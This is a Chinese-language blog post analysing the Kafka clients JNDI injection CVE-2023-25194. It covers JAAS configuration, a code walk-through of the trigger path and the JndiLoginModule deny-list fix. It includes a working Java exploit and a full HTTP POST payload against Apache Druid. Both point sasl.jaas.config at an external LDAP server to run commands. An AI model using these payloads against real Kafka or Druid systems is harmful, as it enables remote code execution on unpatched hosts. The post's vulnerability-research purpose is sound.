• Kafka JNDI 注入分析(CVE-2023-25194)


    Apache Kafka Clients Jndi Injection

    漏洞描述

    Apache Kafka 是一个分布式数据流处理平台,可以实时发布、订阅、存储和处理数据流。Kafka Connect 是一种用于在 kafka 和其他系统之间可扩展、可靠的流式传输数据的工具。攻击者可以利用基于 SASL JAAS 配置和 SASL 协议的任意 Kafka 客户端,对 Kafka Connect worker 创建或修改连接器时,通过构造特殊的配置,进行 JNDI 注入来实现远程代码执行。

    影响范围

    2.4.0 <= Apache Kafka <= 3.3.2

    前置知识

    Kafka 是什么

    Kafka 是一个开源的分布式消息系统,Kafka 可以处理大量的消息和数据流,具有高吞吐量、低延迟、可扩展性等特点。它被广泛应用于大数据领域,如日志收集、数据传输、流处理等场景。

    感觉上和 RocketMQ 很类似,主要功能都是用来进行数据传输的。

    Kafka 客户端 SASL JAAS 配置

    简单认证与安全层 (SASL, Simple Authentication and Security Layer ) 是一个在网络协议中用来认证和数据加密的构架,在 Kafka 的实际应用当中表现为 JAAS。

    Java 认证和授权服务(Java Authentication and Authorization Service,简称 JAAS)是一个 Java 以用户为中心的安全框架,作为 Java 以代码为中心的安全的补充。总结一下就是用于认证。有趣的是 Shiro (JSecurity) 最初被开发出来的原因就是由于当时 JAAS 存在着许多缺点

    参考自 https://blog.csdn.net/yinxuep/article/details/103242969 还有一些细微的配置这里不再展开。动态设置和静态修改 .conf 文件实际上效果是一致的。

    服务端配置

    1、通常在服务器节点下配置服务器 JASS 文件,例如这里我们将其命名为 kafka_server_jaas.conf,内容如下

    KafkaServer {
        org.apache.kafka.common.security.plain.PlainLoginModule required
        username="eystar"
        password="eystar8888"
        user_eystar="eystar8888"
        user_yxp="yxp-secret";
    };
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7

    说明:

    username +password 表示 kafka 集群环境各个代理之间进行通信时使用的身份验证信息。

    user_eystar="eystar8888" 表示定义客户端连接到代理的用户信息,即创建一个用户名为 eystar,密码为 eystar8888 的用户身份信息,kafka 代理对其进行身份验证,可以创建多个用户,格式 user_XXX=”XXX”

    2、如果处于静态使用中,需要将其加入到 JVM 启动参数中,如下

    if [ "x$KAFKA_OPTS" ]; then
    
        export KAFKA_OPTS="-Djava.security.auth.login.config=/opt/modules/kafka_2.11-2.0.0/config/kafka_server_jaas.conf"
    
    fi
    
    • 1
    • 2
    • 3
    • 4
    • 5

    https://kafka.apache.org/documentation/#brokerconfigs_sasl.jaas.config

    客户端配置

    基本同服务端一致,如下步骤

    1、配置客户端 JAAS 文件,命名为 kafka_client_jaas.conf

    KafkaClient {
            org.apache.kafka.common.security.plain.PlainLoginModule required
            username="eystar"
            password="eystar8888";
    };
    
    • 1
    • 2
    • 3
    • 4
    • 5

    2、JAVA 调用的 Kafka Client 客户端连接时指定配置属性 sasl.jaas.config

    sasl.jaas.config=org.apache.kafka.common.security.plain.PlainLoginModule required \
        username="eystar" \
    password="eystar8888";
    // 即配置属性:(后续会讲到也能够动态配置,让我想起了 RocketMQ)
    Pro.set(“sasl.jaas.config”,org.apache.kafka.common.security.plain.PlainLoginModule required username=\"eystar\" password=\"eystar8888\";";);
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    Kafka 客户端动态修改 JAAS 配置

    方式一:配置 Properties 属性,可以注意到这一个字段的键名为 sasl.jaas.config,它的格式如下

    loginModuleClass controlFlag (optionName=optionValue)*;
    
    • 1

    其中的 loginModuleClass 代表认证方式, 例如 LDAP, Kerberos, Unix 认证,可以参考官方文档 https://docs.oracle.com/javase/8/docs/technotes/guides/security/jgss/tutorials/LoginConfigFile.html 其中有一处为 JndiLoginModule,JDK 自带的 loginModule 位于 com.sun.security.auth.module

    module

    //安全模式 用户名 密码
    props.setProperty("sasl.jaas.config", "org.apache.kafka.common.security.plain.PlainLoginModule required username=\"usn\" password=\"pwd\";");
    props.setProperty("security.protocol", "SASL_PLAINTEXT");
    props.setProperty("sasl.mechanism", "PLAIN");
    
    • 1
    • 2
    • 3
    • 4

    方式二:设置系统属性参数

    // 指定kafka_client_jaas.conf文件路径 
    String confPath = TestKafkaComsumer.class.getResource("/").getPath()+ "/kafka_client_jaas.conf"; 
    System.setProperty("java.security.auth.login.config", confPath);
    
    • 1
    • 2
    • 3

    帮助网安学习,全套资料S信免费领取:
    ① 网安学习成长路径思维导图
    ② 60+网安经典常用工具包
    ③ 100+SRC分析报告
    ④ 150+网安攻防实战技术电子书
    ⑤ 最权威CISSP 认证考试指南+题库
    ⑥ 超1800页CTF实战技巧手册
    ⑦ 最新网安大厂面试题合集(含答案)
    ⑧ APP客户端安全检测指南(安卓+IOS)

    实现代码

    消费者

    public class TestComsumer {
    
       public static void main(String[] args) {
    
            Properties props = new Properties();
            props.put("bootstrap.servers", "192.168.1.176:9092");
            props.put("group.id", "test_group");
            props.put("enable.auto.commit", "true");
            props.put("auto.commit.interval.ms", "1000");
            props.put("key.deserializer",
                    "org.apache.kafka.common.serialization.StringDeserializer");
            props.put("value.deserializer",
                    "org.apache.kafka.common.serialization.StringDeserializer");
            // sasl.jaas.config的配置
            props.setProperty("sasl.jaas.config", "org.apache.kafka.common.security.plain.PlainLoginModule required username=\"usn\" password=\"pwd\";");
            props.setProperty("security.protocol", "SASL_PLAINTEXT");
            props.setProperty("sasl.mechanism", "PLAIN");
    
            KafkaConsumer<String, String> consumer = new KafkaConsumer<>(props);
            consumer.subscribe(Arrays.asList("topic_name"));
            while (true) {
               try {
                    ConsumerRecords<String, String> records = consumer.poll(Duration
                            .ofMillis(100));
                    for (ConsumerRecord<String, String> record : records)
                        System.out.printf("offset = %d, partition = %d, key = %s, value = %s%n",
                                record.offset(), record.partition(), record.key(), record.value());
              
                } catch (Exception e) {
                    e.printStackTrace();
                }
            }
    
        
        }
    
    }
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    • 32
    • 33
    • 34
    • 35
    • 36
    • 37

    生产者

    public class TestProduce {
    
        public static void main(String args[]) {
    
            Properties props = new Properties();
    
            props.put("bootstrap.servers", "192.168.1.176:9092");
            props.put("acks", "1");
            props.put("retries", 3);
            props.put("batch.size", 16384);
            props.put("buffer.memory", 33554432);
            props.put("linger.ms", 10);
            props.put("key.serializer",
                    "org.apache.kafka.common.serialization.StringSerializer");
            props.put("value.serializer",
                    "org.apache.kafka.common.serialization.StringSerializer");
    
            //sasl
            props.setProperty("sasl.jaas.config", "org.apache.kafka.common.security.plain.PlainLoginModule required username=\"usn\" password=\"pwd\";");
            props.setProperty("security.protocol", "SASL_PLAINTEXT");
            props.setProperty("sasl.mechanism", "PLAIN");
    
            Producer<String, String> producer = new KafkaProducer<>(props);
            
           /**
            * ProducerRecord 参数解析 第一个:topic_name为生产者 topic名称,
            * 第二个:对于生产者kafka2.0需要你指定一个key
            * ,在企业应用中,我们一般会把他当做businessId来用,比如订单ID,用户ID等等。 第三个:消息的主要信息
            */
    
            try {
                  producer.send(new ProducerRecord<String, String>("topic_name", Integer.toString(i), "message info"));
    
            } catch (InterruptedException e) {
                   e.printStackTrace();
            }
    
       }
    
    }
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    • 32
    • 33
    • 34
    • 35
    • 36
    • 37
    • 38
    • 39
    • 40

    漏洞复现

    漏洞触发点其实是在 com.sun.security.auth.module.JndiLoginModule#attemptAuthentication 方法处

    lookup.png

    理顺逻辑很容易构造出 EXP

    import org.apache.kafka.clients.consumer.KafkaConsumer;
    import org.apache.kafka.clients.producer.KafkaProducer;
    
    import java.util.Properties;
    
    public class EXP {
        public static void main(String[] args) throws Exception {
            Properties properties = new Properties();
            properties.put("bootstrap.servers", "127.0.0.1:1234");
            properties.put("key.deserializer", "org.apache.kafka.common.serialization.StringDeserializer");
            properties.put("value.deserializer","org.apache.kafka.common.serialization.StringDeserializer");
    
            properties.put("sasl.mechanism", "PLAIN");
            properties.put("security.protocol", "SASL_SSL");
            properties.put("sasl.jaas.config", "com.sun.security.auth.module.JndiLoginModule " +
                    "required " +
                    "user.provider.url=\"ldap://124.222.21.138:1389/Basic/Command/Base64/Q2FsYw==\" " +
                    "useFirstPass=\"true\" " +
                    "group.provider.url=\"xxx\";");
    
            KafkaConsumer kafkaConsumer = new KafkaConsumer<>(properties);
            kafkaConsumer.close();
        }
    }
    
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25

    EXP.png

    漏洞分析

    前面有非常多的数据处理与赋值,这里就跳过了,直接看 org.apache.kafka.clients.consumer.KafkaConsumer 类的第 177 行 ClientUtils.createChannelBuilder(),跟进。

    createChannelBuilder.png

    继续跟进,这里会先判断 SASL 模式是否开启,只有开启了才会往下跟进到 create() 方法

    SASL_SSL.png

    跟进 create() 方法,做完客户端的判断和安全协议的判断之后,调用了 loadClientContext() 方法,跟进,发现其中还是加载了一些配置。

    loadClientContext.png

    跳出来,跟进 ((ChannelBuilder)channelBuilder).configure(configs) 方法,最后跟到 org.apache.kafka.common.security.authenticator.LoginManager 的构造函数。

    LoginManager.png

    跟进 login() 方法,此处 new LoginContext(),随后调用 login() 方法,跟进

    loginContext.png

    这里会调用 JndiLoginModuleinitialize() 方法

    moduleStack.png

    初始化完成之后,此处调用 JndiLoginModulelogin() 方法,最后到 JndiLoginModuleattemptAuthentication() 方法,完成 Jndi 注入。

    down.png

    漏洞修复

    在 3.4.0 版本中, 官方的修复方式是增加了对 JndiLoginModule 的黑名单

    org.apache.kafka.common.security.JaasContext#throwIfLoginModuleIsNotAllowed

    private static void throwIfLoginModuleIsNotAllowed(AppConfigurationEntry appConfigurationEntry) {
        Set<String> disallowedLoginModuleList = (Set)Arrays.stream(System.getProperty("org.apache.kafka.disallowed.login.modules", "com.sun.security.auth.module.JndiLoginModule").split(",")).map(String::trim).collect(Collectors.toSet());
        String loginModuleName = appConfigurationEntry.getLoginModuleName().trim();
        if (disallowedLoginModuleList.contains(loginModuleName)) {
            throw new IllegalArgumentException(loginModuleName + " is not allowed. Update System property '" + "org.apache.kafka.disallowed.login.modules" + "' to allow " + loginModuleName);
        }
    }
    
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8

    Apache Druid RCE via Kafka Clients

    影响版本:Apache Druid <= 25.0.0

    Apache Druid 是一个实时分析型数据库, 它支持从 Kafka 中导入数据 (Consumer) , 因为目前最新版本的 Apache Druid 25.0.0 所用 kafka-clients 依赖的版本仍然是 3.3.1, 即存在漏洞的版本, 所以如果目标 Druid 存在未授权访问 (默认配置无身份认证), 则可以通过这种方式实现 RCE

    有意思的是, Druid 包含了 commons-beanutils:1.9.4 依赖, 所以即使在高版本 JDK 的情况下也能通过 LDAP JNDI 打反序列化 payload 实现 RCE

    • 漏洞 UI 处触发点:Druid Web Console - Load data - Apache Kafka

    在这里可以加载 Kafka 的 Data,其中可以修改配置项 sasl.jaas.config,由此构造 Payload

    POST http://124.222.21.138:8888/druid/indexer/v1/sampler?for=connect HTTP/1.1
    Host: 124.222.21.138:8888
    Content-Length: 916
    Accept: application/json, text/plain, */*
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.43
    Content-Type: application/json
    Origin: http://124.222.21.138:8888
    Referer: http://124.222.21.138:8888/unified-console.html
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,ja;q=0.5,zh-TW;q=0.4,no;q=0.3,ko;q=0.2
    Connection: close
    
    {"type":"kafka","spec":{"type":"kafka","ioConfig":{"type":"kafka","consumerProperties":{"bootstrap.servers":"127.0.0.1:1234",
    "sasl.mechanism":"SCRAM-SHA-256",
                    "security.protocol":"SASL_SSL",
                    "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://124.222.21.138:1389/Basic/Command/base64/aWQgPiAvdG1wL3N1Y2Nlc3M=\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
    },"topic":"123","useEarliestOffset":true,"inputFormat":{"type":"regex","pattern":"([\\s\\S]*)","listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965","columns":["raw"]}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":"1970-01-01T00:00:00Z"},"dimensionsSpec":{},"granularitySpec":{"rollup":false}},"tuningConfig":{"type":"kafka"}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17

    druidAttack.png

    success-25194.png

    druid-kafka-indexing-service 这个 extension 中可以看到实例化 KafkaConsumer 的过程

    KafkaRecordSupplier.png

    而上面第 286 行的 addConsumerPropertiesFromConfig() 正是进行了动态修改配置

    Apache Druid 26.0.0 更新了 kafka 依赖的版本

    https://github.com/apache/druid/blob/26.0.0/pom.xml#L79

    druidNewVersion.png

  • 相关阅读:
    HTTP状态管理:Cookie&Session
    app一键加固加签名脚本 百度加固 window版本
    代码审计学习phpcms头像上传漏洞
    电脑怎么用U盘重装系统-电脑用U盘重装Win10系统的步骤
    Wi-SUN归来,信驰达携手TI发力广域自组网
    递归排序进行取值
    MacBook安装使用腾讯柠檬清理Lemon
    【傻瓜式教程】Windows下安装Hive MySQL版【附安装Hadoop教程】全网最详细的图文教程
    使用vmware虚拟机安装centos7以及终端管理工具
    Matlab创建文字云
  • 原文地址:https://blog.csdn.net/qq_38154820/article/details/134328194